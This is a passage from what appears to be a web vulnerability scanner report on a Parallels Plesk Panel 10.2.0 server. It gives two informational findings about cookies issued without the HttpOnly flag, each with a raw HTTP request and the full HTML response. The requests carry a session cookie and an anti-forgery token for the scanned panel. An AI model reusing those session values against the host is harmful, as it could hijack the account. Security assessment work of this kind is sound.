class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" 
id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find FTP accounts.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FtpUsersListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all FTP accounts.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FtpUsersListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FtpUsersListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1 FTP accounts total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" 
class="checkbox" name="FtpUsersListSelectAll" value="true" onClick="FtpUsersListSelect()"></th><th class="icon"><A href="#" onClick="FtpUsersListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort FTP accounts by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="35%" class="sort"><A href="#" onClick="FtpUsersListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort FTP accounts by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="65%"><A href="#" onClick="FtpUsersListSort(&#039;home&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort FTP accounts by home directory.&quot;&#125;]);" onMouseOut="tooltip.hide();">Home</a></th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_hosting_1" value="hosting_1" disabled onClick="FtpUsersListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Domain administrator&#039;s FTP account&quot;&#125;]);" onMouseOut="tooltip.hide();"><IMG src="/skins/default/plesk/icons/ftpsession_domain_user.gif" width="16" height="16" alt="ftpsession_domain_user.gif" title=""></a></td><td><A href="/smb/web/edit" 
onClick=";lon();">xsscx</a></td><td>/</td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1 FTP accounts total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FtpUsersListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("ftpuserslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FtpUsersListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FtpUsersListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FtpUsersListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FtpUsersListSelectAll.checked;
                           FtpUsersListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FtpUsersListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FtpUsersListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FtpUsersListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FtpUsersListSearchShow()
           {
               var sc = document.getElementById("FtpUsersListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FtpUsersListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FtpUsersListSearchHide()
           {
               var sc = document.getElementById("FtpUsersListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FtpUsersListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FtpUsersListRemove(f)
           {
               if (0 == FtpUsersListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/ftp-users/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>
</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.29. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/hotlink-protection/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/hotlink-protection/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/hotlink-protection/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:13:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:13:47 GMT
Connection: close
Content-Length: 16737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fhotlink-protection%252F%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fhotlink-protection%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span><a name="status" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Hotlink protection is switched off for this domain.&quot;&#125;]);" onMouseOut="tooltip.hide();"><img src="/skins/default/plesk/icons/off.gif" width="16" height="16"></a>&nbsp;Hotlink Protection</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.hosting.hotlink-protection/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function add_oC(f)
           {
               o = f.friend_domain_list;
               v = f.friend_domain;
               if ("" == v.value) {
                   alert("Please type a domain name to be added.");
                   return true;
               }
               for (i = 0; i < o.options.length; i++) {
                   if (o.options[i].value.toLowerCase() == v.value.toLowerCase()) {
                       v.value = "";
                       return true;
                   }
               }
               o.options.add(new Option(v.value, v.value));
               v.value = "";
               save_changes_oC(f);
               return true;
           }
           function remove_oC(f)
           {
               o = f.friend_domain_list;
               if (-1 == o.selectedIndex) {
                   alert("Select domains to be removed.");
                   return true;
               }
               for (i = 0; i < o.options.length; ) {
                   if (o.options[i].selected)
                       o.options[i] = null;
                   else
                       i++;
               }
               save_changes_oC(f);
               return true;
           }
           function save_changes_oC(f)
           {
               o = f.friend_domain_list;
               v = f.friend_domains;
               var added = new Array();
               for (i = 0; i < o.options.length; i++)
                   added.push(o.options[i].value);
               v.value = added.join(",");
           }
           function turn_on_off_oC(command)
           {
               f = document.forms[0];
               f.cmd.value = command;
               lsubmit(f);
               return false;
           }
           function update_oC(command)
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/hotlink-protection/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <div class="toolsArea">
<fieldset>
<legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr><td>
   <div class="screenButtons">
   <DIV class="commonButton" id="bid-enable" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enable hotlink protection of the website content.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return turn_on_off_oC(&#039;turn_on&#039;);;return false;" style=""><BUTTON name="bname_enable" id="buttonid-enable" type="button" onClick="Event.stop(event);return turn_on_off_oC(&#039;turn_on&#039;);;return false;">Switch On</BUTTON><SPAN id="spanid-enable">Switch On</SPAN></DIV>
   </div>
</td></tr>
</table>
</fieldset>
</div>

<div class="formArea">
<fieldset>
<legend>Settings</legend><table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name">
       <label for="fid-extensions">Protected files extensions</label>
   </td>
   <td style="width: 200px;">
       <textarea name="extensions" id="fid-extensions" rows="5" style="width: 200px">bmp dib rle emf wmf gif jpg jpeg jpe jif jfif pcx png tga tiff tif</textarea>
   </td>
   <td></td>
</tr>
<tr><td><br></td><td><br></td><td><br></td></tr>
<tr >
   <td class="name">
       <label for="fid-extensions">Addresses of friendly websites</label>
   </td>
   <td style="width: 200px;">
       <input type="text" name="friend_domain" id="fid-friend_domain" value="" style="width: 200px">
   </td>
   <td>
       <DIV class="commonButton" id="bid-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a website address to the list of friendly websites. &quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);add_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_add" id="buttonid-add" type="button" onClick="Event.stop(event);add_oC(document.forms[0]);return false;">Add</BUTTON><SPAN id="spanid-add">Add</SPAN></DIV>
   </td>
</tr>
<tr >
   <td class="name">
       <label for="fid-friend_domain_list"></label>
   </td>
   <td style="width: 200px;">
       <select multiple name="friend_domain_list" id="fid-friend_domain_list" size="10" style="width: 204px">
           
       </select>
       <input type="hidden" name="friend_domains" value=>
   </td>
   <td>
       <DIV class="commonButton" id="bid-remove" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Remove selected website addresses from the list of friendly websites.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_remove" id="buttonid-remove" type="button" onClick="Event.stop(event);remove_oC(document.forms[0]);return false;">Remove</BUTTON><SPAN id="spanid-remove">Remove</SPAN></DIV>
   </td>
</tr>

</table>
</fieldset>
</div>


   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.30. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/performance/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/performance/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/performance/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/web/view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:14:40 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:14:40 GMT
Connection: close
Content-Length: 12378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fperformance%252F%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fbandwidth-limit%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
